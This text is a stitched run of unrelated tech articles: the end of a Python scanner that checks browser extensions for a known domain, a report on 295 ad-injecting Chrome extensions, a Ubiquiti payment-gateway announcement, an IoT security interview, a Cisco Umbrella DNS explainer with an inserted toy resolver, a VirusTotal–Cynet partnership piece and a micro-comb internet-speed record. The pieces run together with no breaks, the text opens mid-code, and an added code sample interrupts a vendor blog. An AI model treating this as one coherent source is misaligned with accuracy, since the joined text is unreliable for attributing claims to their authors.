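        for ext_id, info in scan_extensions(root).items():
            print(ext_id, info["name"], info["hits"])
```

A hit is a reason to look at the extension in `chrome://extensions`, not proof by itself; conversely a clean scan only rules out a literal occurrence of the domain, since the loader could build the hostname at runtime.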
Almost all the 295 extensions were still available on the official Chrome Web Store earlier today, when we received the list from AdGuard.
Extensions started being pulled down from the store after we reached out to Google’s Web Store team and after AdGuard published a blog post detailing their findings.
The same blog post also details additional bad practices on the Chrome Web Store, such as store moderators allowing a large number of copycat extensions to clone popular add-ons, capitalize on their brands, reach millions of users, while also containing malicious code that performs ad fraud or cookie stuffing.
The full list of 295 ad-injecting extensions is available below, at the end of this article.
When Google removes an extension from the Chrome Web Store for malicious activity, the extension is also disabled in users’ browsers and marked as “malware” in Chrome’s Extension section.
Users still have to manually uninstall it from their browsers.
We believe that WISPs serve a crucial role in these difficult times by providing Internet connectivity to all our communities. Our goal with UNMS Cloud and CRM is to empower WISPs with world-class tools and services so that they can focus on connecting the world.
That’s why we are proud to introduce the Ubiquiti Payment Gateway.
Easy and Affordable Payment Processing
We know that fees can add up. That’s why Ubiquiti Payment Gateway is offering an industry-leading processing fee of 1.9%+30c per transaction for the first year.
Better yet, the UPG is simple to use! No need to set up accounts with other payment gateways or use a separate site to manage your subscriptions – simply activate the UPG with a few clicks, go through our quick onboarding process, and you will be using the UPG in no time.
If you are currently using other payment options for your subscriptions, you can easily switch to the UPG from the billing settings. We will continue to support other payment options, if you prefer to keep your existing payment processors.
For now, Ubiquiti Payment Gateway is only available in the United States, but we are working to bring it to other countries. Stay tuned.
Automatic Payments
The UPG isn’t the only thing we’ve been working on. We know that managing monthly payments can be time-consuming. That’s why we have built autopayments into the latest release of CRM. You can activate it in the billing settings:
Autopayments can be set to trigger at invoice creation date or at the due date. No more need to keep track of due dates!
An IoT device is simply any physical device with a defined purpose that has an operating system and can communicate through the internet with other things. Projections show that by 2021, about 25 billion IoT devices will be in operation, and 75 billion by the year 2025.
Supporting so many connected devices used to be impossible. Now, advances in technology such as IPv6—the communications protocol that provides an identification and location system for computers on networks and routes traffic across the Internet—and 5G are enabling the IoT revolution.
Benefits of IoT
The benefits of IoT span across all industries, including agriculture and healthcare, but personal lives are enhanced by IoT as well. For example, IoT thermostats monitor and control temperature, which is both convenient and cost saving. Smart watches and Fitbits monitor health stats such as pulse and steps, going so far as to send this information to a doctor or sounding an alert if a risk is detected. Smart cities, homes, and cars are other large-scale examples of IoT. While the ultimate realization of these technologies is a long way off and involves the use of imagination, advancements in IoT aren’t slowing down.
In fact, wearables are a perfect example of this. What was once a clunky step-tracking device is now a fashion statement that serves multiple purposes. In addition, designers and engineers are playing with fabrics that can be interwoven with IoT components so a sport shoe can measure speed, heartbeat, and sweat output or a jacket can charge phones.
Cyber Security With Wearables
However, wearables are prone to cyber attacks. While not a wearable, a similar connected device, a pacemaker, was compromised in 2018, which opened the industry's eyes to the risks that come along with IoT devices. As Dr. Antoniou explains, “The pacemaker was compromised through a remote execution of the code into the person who was having the pacemaker.”
Manufacturers of connected wearables must practice due diligence to ensure that device security is done correctly. Dr. Antoniou emphasizes that the onus lies with the manufacturer.
Smart Cities and IoT
When people think of smart cities, they often envision traffic signals that change according to the current traffic pattern, tickets handed out automatically after cameras catch illegal incidents, or tolls automatically deducted from checking accounts when a sensor deems it appropriate. Smart cities are so much more than that, however.
Dr. Antoniou explains that a smart city exists as an ecosystem of those sensor components plus the services the city is providing. That includes public lighting, smart roads and parks, and free Wi-Fi across the city. Services include DMV renewal and efficiency measures that help keep costs and resource drain low through the use of a connected device or app.
Enterprise IoT
Enterprise IoT, also called Industry 4.0, consists of IoT devices that are designed to operate within a business to drive efficiency, effectiveness, and cost savings. Examples include voice over IP phones, smart lighting within the building, and smart TVs and vending machines located in an enterprise building. With these tools, an internet connection gives TVs online access and lets vending machines take debit cards. Security features like cameras and intrusion detection also fall into the realm of Enterprise IoT.
There is some concern that Industry 4.0 will eliminate jobs, but Dr. Antoniou believes the contrary. “I think we will see some reduction in certain jobs, but then we will see more demand in other jobs. As we know, cyber security is a very hot field nowadays, and if you go to the Department of Labor, you can see millions of openings especially in cyber security.” He goes on to explain that whatever IT administration and project management jobs are lost to IoT will be filled by cyber security jobs, and then some. He also believes any collateral damage will be worth one other key benefit: sustainability.
“Sustainability is a big, big issue and a trending around the globe. So these devices, they will be helping us to accomplish [the things that make] a better planet: reduce waste [and] make more effective use of resources and consumption.”
On-Prem IoT Security
Many at-home IoT devices run on Wi-Fi connected to home modems. Dr. Antoniou encourages everyone who purchases a new IoT device to always read the manufacturer instructions in order to understand what kind of security parameters and configurations need to be put in place for that device. He also talks about Rule Zero, or his firewall rule. “I explicitly deny everything inbound to my home… That would protect your IoT, but also your other devices that are connected to your home network.”
Dr. Antoniou stresses the fact that IoT technology is still in its infancy. There are a lot of security and connectivity kinks to be worked out. Too many manufacturers are rolling out new, snazzy devices without actively imagining all the future security risks the device may enable. Cyber security needs to be an active part of the manufacturing supply chain.
Digital Identities
Finally, each device must have its own digital identity, or an identity that the device can assume for the entirety of its life. “So the digital identities on the IoTs, it is similar to what we call the identity access management, and it's important to have them. And today, we don't have a centralized digital identity management for IoTs.” Dr. Antoniou is an expert in the future of digital identity evolution: “if you get that digital ID and marry it with a microchip that is embedded to this device and it creates a strong encryption algorithm and somehow creates a digital ID in a centralized identity and access management database that is utilizing blockchain for verification, authentication, and authorization, that device now has a digital ID. It has a body of existence.”
Humans are identified by a social security number, which enables transactions like home loans or tax payments. Digital identities for IoT devices identify them within their ecosystem. From there, authorization is granted only to the IDs of the devices we want active on our home or enterprise network. This system is not currently in place. For example, a rogue employee could potentially go to work, pair their smart watch with a Bluetooth device, piggyback into the work network, and steal data. If that smart watch had a digital ID, the network would know instantly that it doesn’t belong.
Dr. Antoniou explains that, currently, the best defense against IoT threats is enterprise education and policy. By running a risk analysis, companies start to think about connectivity as a whole. From there, they can create policies and train employees on those policies.
When asked about current IoT regulations, Dr. Antoniou wearily explains that there aren’t any. Some countries are further ahead than others, however, and most countries are working on them. Also, there are commonly accepted preliminary guidelines. “NIST, the National Institute of Standards and Technology, run by the United States government, has some preliminary frameworks for IoT, but it has not come to fruition as a standard yet.”
In today’s blog post, we’ll talk about the difference between authoritative and recursive domain name system (DNS) servers. We’ll explain how these two types of DNS servers form the foundation of the internet and help the world stay connected.
What is the domain name system?
Every computer on the Internet identifies itself with an “Internet Protocol” or “IP” address, which is a series of numbers — just like a phone number. That means you can contact any of those computers by typing in the website name, or you can type the IP address into your browser address bar. Either method will get you to the same destination. All servers that host websites and apps on the internet have IP addresses, too.
Give it a try: the IP address of the Cisco Umbrella website is 67.215.70.40.
The domain name system (DNS) is sometimes referred to as the “phone book” of the Internet. You can connect to our website by typing in the IP address in the address bar of your browser, but it’s much easier to type in umbrella.cisco.com. DNS was invented so that people didn’t need to remember long IP address numbers (like phone numbers) and could look up websites by human-friendly names like umbrella.cisco.com instead.
There are too many sites on the Internet for your personal computer to keep a complete list. DNS servers power a website directory service to make things easier for humans. Like phone books, you won’t find one big book that contains every listing for everyone in the world (how many pages would that require? That’s a question for a different blog post.)
There are two types of DNS servers: authoritative and recursive. Authoritative nameservers are like the phone book company that publishes multiple phone books, one per region. Recursive DNS servers are like someone who uses a phone book to look up the number to contact a person or company. Keep in mind, these companies don’t actually decide what number belongs to which person or company — that’s the responsibility of domain name registrars.
Let’s talk about the two different types in more detail.
What is a recursive DNS server?
When you type a website address into your browser address bar, it might seem like magic happens. In reality, the DNS system makes effortless internet browsing possible. First, your browser connects to a recursive DNS server. There are many thousands of recursive DNS servers in the world. Many people use the recursive DNS servers managed by their Internet Service Provider (ISP) and never change them. If you’re a Cisco Umbrella customer, you’re using our recursive DNS servers instead.
Once your computer connects to its assigned recursive DNS server, it asks the question “what’s the IP address assigned to that website name?” The recursive DNS server doesn’t have a copy of the phone book, but it does know where to find one. So it connects to another type of DNS server to continue the search.
What is an authoritative DNS nameserver?
The second type of DNS server holds a copy of the regional phone book that matches IP addresses with domain names. These are called authoritative DNS servers. Authoritative DNS nameservers are responsible for providing answers to recursive DNS nameservers about where specific websites can be found. These answers contain important information for each domain, like IP addresses.
Like phone books, there are different authoritative DNS servers that cover different regions (a company, the local area, your country, etc.). No matter what region it covers, an authoritative DNS server performs two important tasks. First, it stores lists of domain names and their associated IP addresses. Second, it responds to requests from a recursive DNS server (the person who needs to look up a number) about the correct IP address assigned to a domain name. After getting the answer, the recursive DNS server sends that information back to the computer (and browser) that requested it. The computer connects to the IP address, and the website loads, leading to a happy user who can go on with their day.
Putting it all together
This process happens so quickly that you don’t even notice it happening — unless, of course, something is broken.
Let’s use a real world example. Imagine that you are sitting at your computer and you want to search for pictures of cats wearing bow ties (hey, we don’t judge). So you decide to visit Google to do a web search.
First, you type www.google.com into your web browser. However, your computer doesn’t know the IP address of the server for www.google.com. So your computer starts by sending a query to its assigned recursive DNS nameserver. For this example, we’ll assume you’re one of our customers, so it’s a Cisco Umbrella server. Your computer asks the recursive DNS server to locate the IP address of www.google.com. The Cisco Umbrella recursive DNS nameserver is now assigned the task of finding the IP address of the website. Google is a popular website, so its result will probably be cached. But if the recursive DNS nameserver did not already have a DNS record for www.google.com cached in its system, it will need to ask for help from the authoritative DNS hierarchy to get the answer. This is more likely if you are going to a website that is newer or less popular.
Each part of a domain like www.google.com has a specific authoritative DNS nameserver (or group of redundant authoritative nameservers).
At the top of the server tree are the root domain nameservers. Every website address has an implied “.” at the end, even if we don’t type it in. This “.” designates the DNS root nameservers at the top of the DNS hierarchy. The root domain nameservers will know the IP addresses of the authoritative nameservers that handle DNS queries for the Top Level Domains (TLD) like “.com”, “.edu”, or “.gov”. The Umbrella recursive DNS server first asks the root domain nameserver for the IP address of the .com TLD server, since www.google.com is within the .com TLD.
The root domain nameserver responds with the address of the TLD server. Next, the Umbrella recursive DNS server asks the TLD authoritative server where it can find the authoritative DNS server for www.google.com. The TLD authoritative server responds, and the process continues. The authoritative server for www.google.com is asked where to find www.google.com and the server responds with the answer. Once the Cisco Umbrella recursive DNS server knows the IP address for the website, it responds to your computer with the appropriate IP address. Your browser loads Google, and you can get started with more important business: finding pictures of cats in bow ties.
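The referral chain just described (root, then TLD, then the domain's own authoritative server, with the recursive server caching the final answer), as an added toy simulation that is not Cisco Umbrella's code. The nameservers, their zones and all addresses are constructed in memory, using RFC 5737 documentation ranges, and the resolver bounds the number of referrals it will follow so a mis-delegated zone cannot make it loop forever.

```python
"""Toy iterative DNS resolver. Added example; nameservers and addresses are constructed."""

# Constructed nameservers, keyed by address. Each one either answers directly from
# its own "a" records or refers the asker to the server delegated for a child zone.
SERVERS = {
    "192.0.2.1": {  # root nameserver: knows only where the TLD servers live
        "zone": ".",
        "a": {},
        "delegations": {"com.": "192.0.2.2", "edu.": "192.0.2.3"},
    },
    "192.0.2.2": {  # .com TLD nameserver: knows where google.com's server lives
        "zone": "com.",
        "a": {},
        "delegations": {"google.com.": "192.0.2.4"},
    },
    "192.0.2.4": {  # authoritative nameserver for google.com (constructed address)
        "zone": "google.com.",
        "a": {"www.google.com.": "203.0.113.10"},
        "delegations": {},
    },
}


def qualify(name: str) -> str:
    """Append the implied trailing '.' that marks the DNS root."""
    name = name.lower()
    return name if name.endswith(".") else name + "."


def ask_server(server_addr: str, qname: str) -> tuple:
    """Emulate one query to one nameserver.

    Returns ("answer", ip), ("referral", zone, server_addr) or ("nxdomain",).
    """
    server = SERVERS[server_addr]
    if qname in server["a"]:
        return ("answer", server["a"][qname])
    # Pick the most specific delegated zone that the queried name falls under.
    best = None
    for zone, addr in server["delegations"].items():
        if qname == zone or qname.endswith("." + zone):
            if best is None or len(zone) > len(best[0]):
                best = (zone, addr)
    return ("referral", best[0], best[1]) if best else ("nxdomain",)


class RecursiveResolver:
    """Follows referrals from the root down and caches answers (no TTLs: a simplification)."""

    MAX_REFERRALS = 8  # a well-formed chain is root -> TLD -> zone; anything longer is suspect

    def __init__(self, root_addr: str):
        self.root_addr = root_addr
        self.cache = {}
        self.trace = []  # (server, qname, outcome) for the most recent lookup

    def resolve(self, name: str):
        qname = qualify(name)
        self.trace = []
        if qname in self.cache:
            self.trace.append(("cache", qname, "hit"))
            return self.cache[qname]
        server = self.root_addr
        for _ in range(self.MAX_REFERRALS):
            result = ask_server(server, qname)
            self.trace.append((server, qname, result[0]))
            if result[0] == "answer":
                self.cache[qname] = result[1]
                return result[1]
            if result[0] == "nxdomain":
                return None
            server = result[2]  # follow the referral one level down
        raise RuntimeError(f"referral chain for {qname} exceeded {self.MAX_REFERRALS} hops")
```

Run `RecursiveResolver("192.0.2.1").resolve("www.google.com")` twice: the first lookup's trace walks root, TLD and authoritative server, the second is served from cache.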
Without DNS, the internet stops working
The DNS system is so important to the modern world that we often refer to it as the foundation of the internet. If your recursive DNS service breaks for some reason, you won’t be able to connect to websites unless you type in the IP addresses directly — and who keeps an emergency list of IP addresses in their desk? If the recursive DNS service you use is working, but has been slowed down for some reason (like a cyberattack), then your connection to websites will be slowed down, too.
Cisco Umbrella launched its recursive DNS service in 2006 (as OpenDNS) to provide everyone with reliable, safe, smart, and fast Internet connectivity. Umbrella has a highly resilient recursive DNS network. We’ve had 100% uptime with no DNS outages in our history. Our 30-plus worldwide data centers use anycast routing to send requests transparently to the fastest available data center with automatic failover.
By configuring your network to use Umbrella’s recursive DNS service, you’ll get the fastest and most reliable connectivity you can imagine. But Umbrella provides much more than just plain old internet browsing. Learn more about how we make the internet a safer place for cats in bow ties in our post about DNS-layer security.
VirusTotal, the famous multi-antivirus scanning service owned by Google, recently announced new threat detection capabilities it added with the help of an Israeli cybersecurity firm.
VirusTotal provides a free online service that analyzes suspicious files and URLs to detect malware and automatically shares them with the security community. With the onslaught of new malware types and samples, researchers rely on the rapid discovery and sharing provided by VirusTotal to keep their companies safe from attacks.
VirusTotal relies on a continuous stream of new malware discoveries to protect its members from significant damage.
Cynet, the creator of the autonomous breach protection platform, has now integrated its Cynet Detection Engine into VirusTotal.
The benefits of this partnership are twofold. First, Cynet provides the VirusTotal partner network cutting-edge threat intelligence from its ML-based detection engine (CyAI) that actively protects the company's clients around the globe.
CyAI is a continuously learning and evolving detection model that routinely contributes information about new threats that are not available in VirusTotal. Although many vendors are using AI/ML models, the ability of the models to detect new threats varies greatly.
Cynet routinely outperforms third-party and open source detection platforms and is frequently relied upon in incident response cases when underlying threats remain hidden from other solutions.
For example, Cynet recently conducted an Incident Response engagement for a large telecom provider. Cynet discovered several malicious files that did not appear in the VirusTotal database.
Contributing information on these newly discovered files helps our entire industry perform better and protect businesses against cyber-attacks.
Second, Cynet will leverage intelligence in VirusTotal to inform its CyAI model in order to continuously improve its detection capabilities and accuracy.
Cynet AI is continually evolving, constantly learning new datasets in order to improve its accuracy and decrease its already-low false positive ratio. Comparing files found to be malicious by CyAI against files also found to be malicious by other providers helps to quickly validate Cynet's findings.
Researchers from Monash, Swinburne and RMIT universities have successfully tested and recorded Australia’s fastest internet data speed, and that of the world, from a single optical chip – capable of downloading 1000 high definition movies in a split second.
Published in the prestigious journal Nature Communications, these findings have the potential to not only fast-track the next 25 years of Australia’s telecommunications capacity, but also the possibility for this home-grown technology to be rolled out across the world.
In light of the pressures being placed on the world’s internet infrastructure, recently highlighted by isolation policies as a result of COVID-19, the research team led by Dr Bill Corcoran (Monash), Distinguished Professor Arnan Mitchell (RMIT) and Professor David Moss (Swinburne) were able to achieve a data speed of 44.2 Terabits per second (Tbps) from a single light source.
This technology has the capacity to support the high-speed internet connections of 1.8 million households in Melbourne, at the same time, and billions across the world during peak periods.
Demonstrations of this magnitude are usually confined to a laboratory. But, for this study, researchers achieved these quick speeds using existing communications infrastructure where they were able to efficiently load-test the network.
They used a new device that replaces 80 lasers with one single piece of equipment known as a micro-comb, which is smaller and lighter than existing telecommunications hardware. It was planted into and load-tested using existing infrastructure, which mirrors that used by the NBN.
Image caption: The micro-comb chip on top of an A$2 coin. This tiny chip produces an infrared rainbow of light, the equivalent of 80 lasers. The ribbon to the right of the image is an array of optical fibres connected to the device. The chip itself measures about 3x5 mm.
It is the first time any micro-comb has been used in a field trial, and it carries the highest amount of data ever produced from a single optical chip.
“We’re currently getting a sneak-peek of how the infrastructure for the internet will hold up in two to three years’ time, due to the unprecedented number of people using the internet for remote work, socialising and streaming. It’s really showing us that we need to be able to scale the capacity of our internet connections,” says Dr Bill Corcoran, co-lead author of the study and Lecturer in Electrical and Computer Systems Engineering at Monash University.
“What our research demonstrates is the ability for fibres that we already have in the ground, thanks to the NBN project, to be the backbone of communications networks now and in the future. We’ve developed something that is scalable to meet future needs.
“And it’s not just Netflix we’re talking about here – it’s the broader scale of what we use our communication networks for. This data can be used for self-driving cars and future transportation and it can help the medicine, education, finance and e-commerce industries, as well as enable us to read with our grandchildren from kilometres away.”
To illustrate the impact optical micro-combs have on optimising communication systems, researchers installed 76.6km of ‘dark’ optical fibres between RMIT’s Melbourne City Campus and Monash University’s Clayton Campus. The optical fibres were provided by Australia’s Academic Research Network.
Within these fibres, researchers placed the micro-comb – contributed by Swinburne, as part of a broad international collaboration – which acts like a rainbow made up of hundreds of high quality infrared lasers from a single chip. Each ‘laser’ has the capacity to be used as a separate communications channel.
Researchers were able to send maximum data down each channel, simulating peak internet usage, across 4THz of bandwidth.
Distinguished Professor Mitchell said reaching the optimum data speed of 44.2 Tbps showed the potential of existing Australian infrastructure. The future ambition of the project is to scale up the current transmitters from hundreds of gigabytes per second towards tens of terabytes per second without increasing size, weight or cost.
“Long-term, we hope to create integrated photonic chips that could enable this sort of data rate to be achieved across existing optical fibre links with minimal cost,” Distinguished Professor Mitchell says.
“Initially, these would be attractive for ultra-high speed communications between data centres. However, we could imagine this technology becoming sufficiently low cost and compact that it could be deployed for commercial use by the general public in cities across the world.”
Professor Moss, Director of the Optical Sciences Centre at Swinburne, says: “In the 10 years since I co-invented micro-comb chips, they have become an enormously important field of research.
“It is truly exciting to see their capability in ultra-high bandwidth fibre optic telecommunications coming to fruition. This work represents a world-record for bandwidth down a single optical fibre from a single chip source, and represents an enormous breakthrough for part of the network which does the heaviest lifting. Micro-combs offer enormous promise for us to meet the world’s insatiable demand for bandwidth.”